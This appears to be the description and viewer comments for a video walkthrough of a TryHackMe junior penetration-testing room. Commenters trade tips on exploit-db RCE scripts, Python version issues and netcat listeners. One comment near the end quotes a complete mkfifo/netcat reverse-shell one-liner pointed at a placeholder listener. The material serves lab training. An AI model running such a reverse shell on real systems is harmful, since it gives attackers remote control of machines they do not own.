This is our continuation series of Junior pentesting learning path on tryhackme.com. We are done with vulnerabilities! Lets have some fun! Patreon to help support the channel! Thank you so much! / stuffy24 Hacker Discord / discord
Dude I was sitting here trying to upload a reverse shell from the admin page and was like "Wait wait... I think I'm going out of bounds from where the room wants me to be"
thank you so much for walking through this one and teaching a bit. Sometimes its too easy to just paste the answer in when you find it because you want to get the badges or you think you know the basics or whatever. Im really trying to force myself to walk through each step to get it in my brain and improve, so thanks, this helped a lot.
You will have to join the discord or Patreon so you can send screenshots and the exact process. It's almost impossible to tell you what's wrong with no context. Our community and myself will try to help for sure though!
@@stuffy24 Done! It turned out that the problem was with me. Instead of giving the shell_me command the AttackBox IP, I was giving it the vulnerable machine's IP. DOH!
I looked up a guide because I knew as soon as I started getting errors in the python code I downloaded from git that there was a problem. After fixing and reading a couple of errors I thought "Ain't no way they expected someone off the street to just be able to edit python code like this." I should have read the hint.
I started with two different exploit py files, and both worked but one needed the OpenBSD reverse shell payload , and I'm mostly annoyed because I don't know exactly why. That exploit they provided ended up being much cleaner anyways. Thanks again!
Thank you for your explanation, i tried 3 of the RCE exploit, and tried to change what the cmd told me where there was error, i ran it with python3 as i didnt know there was a thing call python2 and related stuffs. Thanks so much, this makes me wonder what is python2 and will further look into it soon ;D
Keep up the good work! I've been just using your videos when needed. However, when I'm all done with the certificate I think I might go back and watch all your videos for a good refresher!
I hate having to go through a walkthrough, I couldn't handle it myself. But thanks for sharing this. I watched 2 more walkthroughs for the same room and this was the only one that helped me. Again, thank you.
Really weird I had to set my listener to port 8082 for some reason 8081 would not work. It kept throwing an air but after 10 minutes of trying the same thing I decided to change something and guess what it worked.😂😂 thank you again this is making a lot more sense with these walkthroughs.
Thank you! The Python script from searchsploit didn't work out of the box. I appreciate that you showed the alternate script location. That was a huge help.
Excellent video. I like that you explain the python version as that was one of the issues I encountered editing the code.I didn't want to make excuses on this room even though I found it quite difficult. That being said you read my mind in regards to the room not being good. 👍
Wow thank you! I was trying to run the exploit from exploit-db and could not for the life of me work out why the word "system" was continuously appearing.
Hi Stuffy24 ! lifesaver, you saved me again, I agree with you we shouldn't be manipulating the script. If they wanted us to do it they would've said something. You're by far the best teaching these rooms ! I even watched some rooms in Arabic, Hindi, to try to follow but everybody else does confusing things. Thank you again !
@@Alexi-pj4yb well I appreciate the support! Make sure to hop in the discord for daily tips and more access to directly ask questions and things! Thanks again!
thank you for explaining things instead of giving us the awnsers like other people do in writups . it helps me learn much more and so i dont get stuck again . legend
HEY! How are you?! I Love your videos and how you explain things! Just wanted to ask a small question....I tried this got everything like you did, ran my netcat, however it didnt open a listener for some reason, I tried with sudo, changing ports, ran it a few times and I wasnt able to get a connection.... I checked the syntax, checked that I put in the right IP and everything.....I pinged it, it was working....So Im not so sure what Im doing wrong =].
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc listenerIP listenerPort >/tmp/f They put this in the cmd: shell...and I don't get this whole thing...
I used the exploit I downloaded from exploit-db and got stuck at system: …. . No matter what I entered that, everything got stuck. As a newbie with little experience, watching several ways to hack this box seems overly complicated. I will use as you and THM suggested, the exploit in the attack box.
